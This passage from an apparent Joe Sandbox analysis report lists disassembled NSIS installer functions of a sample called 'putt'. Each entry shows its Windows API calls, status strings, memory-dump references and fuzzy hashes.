                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                              • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                              Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                              • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                              Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                              • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                              Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                              • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                              • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                              Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                              Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                              Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                              Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00075000,00000064,00136FFC), ref: 00403295
                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                              Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
